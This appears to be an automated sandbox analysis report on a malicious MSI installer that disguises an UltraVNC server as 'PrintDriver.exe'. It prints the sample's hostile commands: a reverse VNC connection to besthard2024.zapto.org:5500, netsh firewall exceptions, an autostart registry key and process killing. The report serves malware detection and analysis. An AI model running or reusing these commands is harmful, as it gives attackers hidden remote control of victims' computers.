                  Source: C:\Windows\Installer\MSI4384.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile written: C:\Games\UltraVNC.iniJump to behavior
                  Source: C:\Games\PrintDriver.exeFile opened: C:\Windows\SYSTEM32\RICHED32.DLLJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: rs8dpaIe6D.msiStatic file information: File size 7064064 > 1048576
                  Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\winvnc\x64\Release\winvnc.pdbGCTL source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr
                  Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\x64\Release\vnchooks.pdb source: vnchooks.dll.1.dr
                  Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\x64\Release\UVncVirtualDisplay.pdb source: UVncVirtualDisplay.dll.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: MSI4384.tmp, 00000003.00000000.1741334832.000000000046F000.00000002.00000001.01000000.00000003.sdmp, MSI4384.tmp, 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp, rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr
                  Source: Binary string: C:\Users\rudi\Desktop\ddengine\x64\Release\ddengine.pdb source: ddengine.dll.1.dr
                  Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\winvnc\x64\Release\winvnc.pdb source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: powercfg.msi.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: PrintDrivers.exe, 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000004.00000000.1742802683.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000000.1887440811.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000002.2957683401.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe.1.dr, powercfg.msi.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: powercfg.msi.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: rs8dpaIe6D.msi, MSI4075.tmp.1.dr, MSI3ECB.tmp.1.dr, 603b50.msi.1.dr, MSI3F98.tmp.1.dr, MSI3F39.tmp.1.dr, MSI3FE7.tmp.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSI4384.tmp, 00000003.00000000.1741334832.000000000046F000.00000002.00000001.01000000.00000003.sdmp, MSI4384.tmp, 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp, rs8dpaIe6D.msi, 603b50.msi.1.dr, MSI4384.tmp.1.dr, MSI4112.tmp.1.dr, 603b52.rbs.1.dr
                  Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: PrintDrivers.exe, 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000004.00000000.1742802683.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000000.1887440811.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe, 00000021.00000002.2957683401.00000000005C9000.00000002.00000001.01000000.00000005.sdmp, PrintDrivers.exe.1.dr, powercfg.msi.1.dr
                  Source: UVncVirtualDisplay.dll.1.drStatic PE information: section name: _RDATA
                  Source: ddengine.dll.1.drStatic PE information: section name: .SharedD
                  Source: vnchooks.dll.1.drStatic PE information: section name: _RDATA
                  Source: PrintDriver.exe.1.drStatic PE information: section name: _RDATA
                  Source: MSI3ECB.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSI3F39.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSI3F98.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSI3FE7.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSI4075.tmp.1.drStatic PE information: section name: .fptable
                  Source: MSI4384.tmp.1.drStatic PE information: section name: .fptable
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0044A019 push ecx; ret 3_2_0044A02C
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005A50CC push ecx; ret 4_2_005A50DF
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005A5676 push ecx; ret 4_2_005A5689
                  Source: C:\Games\PrintDriver.exeCode function: 26_2_00007FF67DA84EC4 push 6FFDC5CAh; ret 26_2_00007FF67DA84ECA
                  Source: C:\Games\PrintDriver.exeCode function: 26_2_00007FF67DA84F10 push 6FFDC5C3h; iretd 26_2_00007FF67DA84F16
                  Source: C:\Games\PrintDriver.exeCode function: 26_2_00007FF67DA84A14 push 6FFDC5D5h; iretd 26_2_00007FF67DA84A1A
                  Source: C:\Games\PrintDriver.exeCode function: 26_2_00007FF67DA84566 push 60F5C5F1h; iretd 26_2_00007FF67DA8456E

                  Persistence and Installation Behavior

                  barindex
                  Drops executables to the windows directory (C:\Windows) and starts them
                  Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI4384.tmpJump to behavior
                  Uses cmd line tools excessively to alter registry or file data
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Games\PrintDriver.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Games\vnchooks.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4384.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3F98.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4075.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Games\UVncVirtualDisplay\UVncVirtualDisplay.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FE7.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3ECB.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Games\ddengine.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Games\PrintDrivers.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3F39.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4384.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3F98.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4075.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FE7.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3ECB.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3F39.tmpJump to dropped file
                  Source: PrintDriver.exe.1.drBinary or memory string: bcdedit.exe
                  Source: PrintDriver.exe.1.drBinary or memory string: RegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -inifile -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootwinsta.dllWinStationConnectWLockWorkstation failed with error 0x%0lXWTSEnumerateSessionsAwtsapi32WTSFreeMemoryConsole -preconnect -service_rdp_run -service_run Global\SessionEventUltraGlobal\SessionEventUltraPreConnectGlobal\EndSessionEventGlobal\SessionUltraPreConnectsas.dllSendSASWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%dwinlogon.exeWTSEnumerateProcessesASeTcbPrivilege@`

                  Boot Survival

                  barindex
                  Creates an undocumented autostart registry key
                  Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows LoadJump to behavior
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005A3D28 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_005A3D28
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Games\PrintDrivers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Games\PrintDriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Games\PrintDriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Games\PrintDriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Games\PrintDriver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Games\PrintDrivers.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Games\vnchooks.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3F98.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI4075.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Games\UVncVirtualDisplay\UVncVirtualDisplay.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3FE7.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3ECB.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Games\ddengine.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3F39.tmpJump to dropped file
                  Source: C:\Games\PrintDrivers.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-32859
                  Source: C:\Windows\Installer\MSI4384.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-34047
                  Source: C:\Windows\Installer\MSI4384.tmpAPI coverage: 5.2 %
                  Source: C:\Games\PrintDrivers.exeAPI coverage: 4.8 %
                  Source: C:\Windows\System32\msiexec.exe TID: 7576Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 7816Thread sleep count: 174 > 30
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 1908Thread sleep count: 182 > 30
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 7908Thread sleep count: 182 > 30
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 2208Thread sleep count: 182 > 30
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 8164Thread sleep count: 182 > 30
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 7648Thread sleep count: 62 > 30
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00461914 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00461914
                  Source: PrintDriver.exe, 0000001A.00000002.2958719797.0000021794F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{epP
                  Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drBinary or memory string: , (Hyper-V Tools)
                  Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drBinary or memory string: , (Hyper-V Server)
                  Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drBinary or memory string: Service Pack: 6aService Pack: 1aService Pack:%d.%dService Pack:%dService Pack:0.%d, (Storage Server Enterprise), (Storage Server Express), (Storage Server Standard), (Storage Server Workgroup), (Storage Server Essentials), (Storage Server), (Home Server Premium Edition), (Home Server Edition), (Terminal Services), (Embedded), (Terminal Services in Remote Admin Mode), (64 Bit Edition), (Media Center Edition), (Tablet PC Edition), (Compute Cluster Edition), (Foundation Edition), (MultiPoint Premium Edition), (MultiPoint Edition), (Security Appliance), (BackOffice), (N Edition), (E Edition), (Hyper-V Tools), (Hyper-V Server), (Server Core), (Uniprocessor Free), (Uniprocessor Checked), (Multiprocessor Free), (Multiprocessor Checked), (Windows Essential Business Server Manangement Server), (Windows Essential Business Server Messaging Server), (Windows Essential Business Server Security Server), (Cluster Server), (Small Business Server), (Small Business Server Premium), (Prerelease), (Evaluation), (Automotive), (China), (Single Language), (Win32s), (Education), (Industry), (Student), (Mobile), (IoT Core), (Cloud Host Infrastructure Server), (S Edition), (Cloud Storage Server), (PPI Pro), (Connected Car), (Handheld)Failed in call to GetOSVersion
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0044A1F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0044A1F1
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005BB9CA mov eax, dword ptr fs:[00000030h]4_2_005BB9CA
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005B3C84 mov eax, dword ptr fs:[00000030h]4_2_005B3C84
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_004225A0 GetProcessHeap,3_2_004225A0
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI4384.tmp "C:\Windows\Installer\MSI4384.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"Jump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0044A1F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0044A1F1
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0044E23B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0044E23B
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0044A385 SetUnhandledExceptionFilter,3_2_0044A385
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0044985D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0044985D
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005A9256 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_005A9256
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005A5248 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_005A5248
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005A53DE SetUnhandledExceptionFilter,4_2_005A53DE
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005A47F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_005A47F5
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_00427800 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,SetWindowPos,WaitForSingleObject,GetExitCodeProcess,GetWindowThreadProcessId,GetWindowLongW,3_2_00427800
                  Source: C:\Games\PrintDrivers.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20 Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>NulJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V DescriptionJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="PrintDriver.exe") get commandline Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "PrintDriver.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmdJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\PrintDrivers.exe C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmdJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V DescriptionJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20 Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALLJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALLJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="PrintDriver.exe") get commandline Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "PrintDriver.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\PrintDriver.exe C:\Games\PrintDriver.exe -autoreconnect ID:5271523 -connect besthard2024.zapto.org:5500 -runJump to behavior
                  Source: C:\Games\PrintDrivers.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /fJump to behavior
                  Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drBinary or memory string: Program Manager
                  Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drBinary or memory string: Shell_TrayWnd
                  Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drBinary or memory string: Progman
                  Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drBinary or memory string: UltraVNC.ini -settingshelperShell_TrayWnd%dpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                  Source: PrintDriver.exe.1.drBinary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitplaceholder1placeholder2restartvncDesktop::~vncDesktop : ~vncDesktop
                  Source: C:\Games\PrintDrivers.exeCode function: 4_2_005A5448 cpuid 4_2_005A5448
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_004650B7
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: GetLocaleInfoW,3_2_0045F310
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: GetLocaleInfoEx,FormatMessageA,3_2_004326C1
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: EnumSystemLocalesW,3_2_004649D3
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: EnumSystemLocalesW,3_2_004649D1
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: EnumSystemLocalesW,3_2_00464A1E
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: EnumSystemLocalesW,3_2_00464AB9
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00464B50
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: EnumSystemLocalesW,3_2_0045EDE2
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: GetLocaleInfoW,3_2_00464DB0
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00464ED5
